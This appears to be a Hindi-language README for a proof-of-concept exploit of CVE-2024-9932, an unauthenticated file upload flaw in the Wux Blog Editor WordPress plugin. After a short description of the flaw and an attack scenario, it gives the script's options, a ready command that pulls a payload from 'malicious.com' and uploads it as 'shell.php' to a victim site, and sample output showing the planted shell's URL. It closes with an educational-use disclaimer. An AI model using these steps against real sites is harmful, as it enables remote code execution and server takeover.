
सबूत-अवधारणा शोषण CVE-2024-9932 के लिए, Wux Blog Editor वर्डप्रेस प्लगइन में एक अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता, जो दुर्भावनापूर्ण फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।
Wux Blog Editor WordPress प्लगइन में wuxbt_insertImageNew फ़ंक्शन में अपर्याप्त फ़ाइल प्रकार सत्यापन के कारण मनमानी फ़ाइल अपलोड की भेद्यता है। संस्करण 3.0.0 तक और इसमें शामिल संस्करण प्रभावित हैं। यह भेद्यता अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड एक्सेक्यूशन (RCE) हो सकता है।
यह भेद्यता wuxbt_insertImageNew फ़ंक्शन में अनुचित फ़ाइल प्रकार सत्यापन से उत्पन्न होती है। यह हमलावरों को बिना प्रमाणीकरण के सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है।
हमले का परिदृश्य:
हमलावर कमजोर प्लगइन का उपयोग करने वाली वेबसाइट की पहचान करता है।
दुर्भावनापूर्ण PHP शेल अपलोड करने के लिए फ़ाइल अपलोड कार्यक्षमता का शोषण करता है।
समझौता किए गए सर्वर पर कमांड निष्पादित करता है।
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]
Wux Blog Editor - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
-ur REMOTE_URL, --remote-url REMOTE_URL
Remote file URL, e.g., http://192.168.100.54/shell.txt
-n NAME, --name NAME Desired file name, e.g., Nxploit.php
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
सफल अपलोड का उदाहरण
1- फ़ाइल मिली:
2- निष्पादन परिणाम: पेलोड को निष्पादित करने के लिए फ़ाइल के URL पर जाएँ।
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम पर इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है।